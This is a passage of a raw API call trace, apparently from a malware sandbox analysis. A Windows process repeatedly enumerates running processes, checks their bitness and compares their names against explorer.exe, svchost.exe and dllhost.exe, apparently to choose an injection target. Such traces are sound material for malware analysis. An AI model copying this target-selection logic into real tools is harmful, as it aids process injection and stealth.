[0181.393] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0181.393] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0181.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0181.393] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.394] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.394] CloseHandle (hObject=0xec) returned 1 [0181.394] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0181.394] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0181.394] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0181.394] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0181.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0181.394] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.394] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.394] CloseHandle (hObject=0xec) returned 1 [0181.394] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0181.394] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0181.394] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0181.394] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0181.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0181.395] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.395] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.395] CloseHandle (hObject=0xec) returned 1 [0181.395] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0181.395] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0181.395] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0181.395] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0181.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0181.396] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.396] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.396] CloseHandle (hObject=0xec) returned 1 [0181.396] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0181.396] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0181.396] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0181.396] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0181.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0181.396] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.396] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.396] CloseHandle (hObject=0xec) returned 1 [0181.396] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0181.396] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0181.396] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0181.396] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0181.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0181.397] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.397] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.397] CloseHandle (hObject=0xec) returned 1 [0181.397] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0181.397] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0181.397] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0181.397] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0181.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0181.398] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.398] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.398] CloseHandle (hObject=0xec) returned 1 [0181.398] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0181.398] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0181.398] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0181.398] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0181.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0181.398] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.398] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.398] CloseHandle (hObject=0xec) returned 1 [0181.398] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0181.398] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0181.398] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0181.398] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0181.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0181.399] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.399] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.399] CloseHandle (hObject=0xec) returned 1 [0181.399] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0181.399] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0181.399] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0181.399] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0181.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0181.400] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.400] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.400] CloseHandle (hObject=0xec) returned 1 [0181.400] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0181.400] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0181.400] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0181.400] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0181.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0181.400] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.400] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.400] CloseHandle (hObject=0xec) returned 1 [0181.400] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0181.400] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0181.400] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0181.400] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0181.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0181.401] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.401] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.401] CloseHandle (hObject=0xec) returned 1 [0181.401] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0181.401] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0181.401] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0181.401] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0181.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0181.402] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.402] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.402] CloseHandle (hObject=0xec) returned 1 [0181.402] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0181.402] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0181.402] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0181.402] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0181.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0181.402] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0181.403] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0181.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0181.403] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0181.404] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0181.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0181.404] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0181.405] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0181.405] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.405] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.405] CloseHandle (hObject=0xec) returned 1 [0181.405] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0181.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0181.406] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.406] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.406] CloseHandle (hObject=0xec) returned 1 [0181.406] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0181.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0181.407] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0181.407] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.407] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.407] CloseHandle (hObject=0xec) returned 1 [0181.407] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0181.407] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0181.408] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.408] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.408] CloseHandle (hObject=0xec) returned 1 [0181.408] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.408] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0181.409] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.409] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.409] CloseHandle (hObject=0xec) returned 1 [0181.409] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0181.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0181.409] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.409] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.409] CloseHandle (hObject=0xec) returned 1 [0181.409] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0181.409] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0181.409] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0181.409] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0181.410] CloseHandle (hObject=0xe8) returned 1 [0181.410] Sleep (dwMilliseconds=0x3e8) [0182.430] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0182.432] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0182.433] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0182.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0182.433] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0182.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0182.434] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0182.434] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0182.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0182.435] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0182.435] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0182.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0182.436] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0182.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0182.436] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0182.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0182.437] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0182.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0182.437] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0182.438] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0182.438] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0182.439] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0182.439] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0182.440] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, 